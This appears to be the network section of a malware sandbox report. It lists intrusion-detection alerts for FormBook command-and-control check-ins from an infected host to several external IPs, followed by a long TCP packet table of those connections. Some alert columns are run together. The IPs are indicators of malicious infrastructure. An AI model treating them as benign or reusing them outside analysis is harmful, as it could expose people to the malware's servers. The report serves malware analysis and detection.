                                                                                2024-12-04T15:32:04.688712+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749856172.67.145.23480TCP
                                                                                2024-12-04T15:32:19.812101+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74989113.248.169.4880TCP
                                                                                2024-12-04T15:32:55.177168+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74992443.199.54.15880TCP
                                                                                2024-12-04T15:33:10.647912+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749991136.143.186.1280TCP
                                                                                2024-12-04T15:33:25.704735+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749996172.67.192.20780TCP
                                                                                2024-12-04T15:33:40.669477+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.750000203.161.43.22880TCP
                                                                                2024-12-04T15:33:56.925217+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.7500048.223.59.21380TCP
                                                                                2024-12-04T15:34:12.096342+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75000854.176.168.5880TCP
                                                                                2024-12-04T15:34:27.408010+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.750012199.59.243.22780TCP
                                                                                2024-12-04T15:34:43.331647+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75001685.159.66.9380TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 4, 2024 15:31:22.932940006 CET4977180192.168.2.7172.67.185.6
                                                                                Dec 4, 2024 15:31:23.053208113 CET8049771172.67.185.6192.168.2.7
                                                                                Dec 4, 2024 15:31:23.053359032 CET4977180192.168.2.7172.67.185.6
                                                                                Dec 4, 2024 15:31:23.063009024 CET4977180192.168.2.7172.67.185.6
                                                                                Dec 4, 2024 15:31:23.184679031 CET8049771172.67.185.6192.168.2.7
                                                                                Dec 4, 2024 15:31:24.306360006 CET8049771172.67.185.6192.168.2.7
                                                                                Dec 4, 2024 15:31:24.306376934 CET8049771172.67.185.6192.168.2.7
                                                                                Dec 4, 2024 15:31:24.306592941 CET4977180192.168.2.7172.67.185.6
                                                                                Dec 4, 2024 15:31:24.309911013 CET4977180192.168.2.7172.67.185.6
                                                                                Dec 4, 2024 15:31:24.430260897 CET8049771172.67.185.6192.168.2.7
                                                                                Dec 4, 2024 15:31:39.929379940 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:40.049953938 CET8049804156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:40.050076008 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:40.076833963 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:40.196712971 CET8049804156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:41.582179070 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:41.672455072 CET8049804156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:41.672553062 CET8049804156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:41.672606945 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:41.672673941 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:41.702466965 CET8049804156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:41.702667952 CET4980480192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:42.600914955 CET4981280192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:42.720902920 CET8049812156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:42.721014977 CET4981280192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:42.747390032 CET4981280192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:42.869728088 CET8049812156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:44.254185915 CET4981280192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:44.374437094 CET8049812156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:44.374514103 CET4981280192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:45.272865057 CET4981880192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:45.393269062 CET8049818156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:45.393425941 CET4981880192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:45.408376932 CET4981880192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:45.529254913 CET8049818156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:45.529268980 CET8049818156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:46.910299063 CET4981880192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:47.030899048 CET8049818156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:47.034907103 CET4981880192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:47.929177046 CET4982580192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:48.049969912 CET8049825156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:48.050052881 CET4982580192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:48.059942961 CET4982580192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:48.180778980 CET8049825156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:49.734977007 CET8049825156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:49.735105038 CET8049825156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:49.735217094 CET4982580192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:49.737786055 CET4982580192.168.2.7156.251.17.224
                                                                                Dec 4, 2024 15:31:49.857647896 CET8049825156.251.17.224192.168.2.7
                                                                                Dec 4, 2024 15:31:55.049249887 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:55.169387102 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:55.169497013 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:55.184544086 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:55.304433107 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.567378044 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.567980051 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.568041086 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:56.691653013 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.710269928 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.834712982 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:57.834861994 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.850023031 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.969985008 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217195988 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217674017 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217744112 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:59.363521099 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.388753891 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.509994030 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:00.510116100 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.614108086 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.734181881 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:00.734206915 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.964569092 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.964891911 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.965195894 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:02.129189968 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.161112070 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.281177998 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:03.281311035 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.380013943 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.501332045 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.686894894 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.687165976 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.688711882 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:04.689779043 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:04.813724995 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:10.448688030 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.569163084 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:10.569246054 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.584470987 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.704140902 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:11.719304085 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:11.719384909 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:12.097950935 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:12.220495939 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:13.116405010 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.319576979 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:13.319660902 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.334724903 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.454551935 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:14.429903030 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:14.430011034 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:14.849252939 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:14.969990015 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:15.866620064 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:15.986413002 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:15.987487078 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:16.003022909 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:16.122796059 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:16.122853041 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:17.161453962 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:17.161520958 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:17.519675970 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:17.657196045 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:18.538361073 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.658246040 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:18.658344984 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.668330908 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.788122892 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.810862064 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.811610937 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.812100887 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:19.814882040 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:19.934492111 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:25.138442039 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.258289099 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:25.258385897 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.275300026 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.395133972 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:26.785301924 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:26.946296930 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:27.803906918 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:27.923963070 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:27.924732924 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:27.940026999 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:28.059931040 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:29.441585064 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:29.606005907 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.460408926 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.580239058 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.580641985 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.596649885 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.717066050 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.717087030 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:32.100645065 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:32.263041019 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:33.116316080 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.237512112 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:33.237576962 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.249103069 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.370592117 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:47.192394018 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:47.192629099 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:49.896435022 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:49.896667957 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:52.520037889 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:52.520112038 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.176834106 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:55.177167892 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.184262991 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.304177999 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:33:01.174741983 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.294789076 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:01.296840906 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.311480999 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.431447983 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636681080 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636749029 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636774063 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636827946 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:02.816751957 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:03.838382959 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:03.958295107 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:03.958380938 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:04.017218113 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:04.137077093 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293071985 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293180943 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293256998 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:05.293319941 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293473005 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:05.535404921 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.555986881 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.675966024 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:06.676043034 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.713494062 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.833471060 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:06.833486080 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994160891 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994287014 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994355917 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:08.223074913 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.242225885 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.362596035 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:09.362831116 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.372771978 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.492868900 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647532940 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647759914 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647766113 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647912025 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.648433924 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648441076 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648457050 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648489952 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.648514986 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.649502039 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.649595022 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.653033972 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.772922039 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:16.005858898 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.127479076 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:16.127630949 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.198621035 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.319015980 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.332479954 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.333986044 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.334057093 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:17.708594084 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:18.754462957 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:18.874979973 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:18.880595922 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:19.075531006 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:19.196145058 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113285065 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113354921 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113464117 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:20.598006010 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.630495071 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.752063990 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:21.752188921 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.847820044 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.967916012 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:21.967973948 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.907182932 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.909018993 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.909169912 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:23.363552094 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.393820047 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.513997078 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:24.514081955 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.527251959 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.647130013 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:25.701351881 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:25.704540014 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:25.704735041 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:25.705539942 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:25.827517033 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:31.212579012 CET4999780192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:31.334544897 CET8049997203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:31.334690094 CET4999780192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:31.352577925 CET4999780192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:31.473484039 CET8049997203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:32.682960033 CET8049997203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:32.682977915 CET8049997203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:32.683067083 CET4999780192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:32.863593102 CET4999780192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:33.883372068 CET4999880192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:34.003873110 CET8049998203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:34.003967047 CET4999880192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:34.035279989 CET4999880192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:34.156718969 CET8049998203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:35.249555111 CET8049998203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:35.249574900 CET8049998203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:35.249697924 CET4999880192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:35.552568913 CET4999880192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:36.569724083 CET4999980192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:36.696657896 CET8049999203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:36.696768999 CET4999980192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:36.712016106 CET4999980192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:36.833547115 CET8049999203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:36.836724997 CET8049999203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:37.931548119 CET8049999203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:37.931602001 CET8049999203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:37.931649923 CET4999980192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:38.223001003 CET4999980192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:39.241926908 CET5000080192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:39.362174034 CET8050000203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:39.362314939 CET5000080192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:39.373671055 CET5000080192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:39.493573904 CET8050000203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:40.669245958 CET8050000203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:40.669393063 CET8050000203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:40.669476986 CET5000080192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:40.673193932 CET5000080192.168.2.7203.161.43.228
                                                                                Dec 4, 2024 15:33:40.793406010 CET8050000203.161.43.228192.168.2.7
                                                                                Dec 4, 2024 15:33:47.230775118 CET5000180192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:47.350739002 CET80500018.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:47.350893974 CET5000180192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:47.365998983 CET5000180192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:47.485953093 CET80500018.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:48.879419088 CET5000180192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:48.999744892 CET80500018.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:48.999819994 CET5000180192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:49.898062944 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:50.018191099 CET80500028.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:50.020721912 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:50.035377026 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:50.157582998 CET80500028.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:51.592020035 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:51.618423939 CET80500028.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:51.618489027 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:51.618585110 CET80500028.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:51.618715048 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:51.712349892 CET80500028.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:51.712403059 CET5000280192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:52.601530075 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:52.721410036 CET80500038.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:52.721510887 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:52.738652945 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:52.858978987 CET80500038.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:52.859002113 CET80500038.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:54.241039038 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:54.331841946 CET80500038.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:54.331897974 CET80500038.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:54.332629919 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:54.332631111 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:54.360770941 CET80500038.223.59.213192.168.2.7
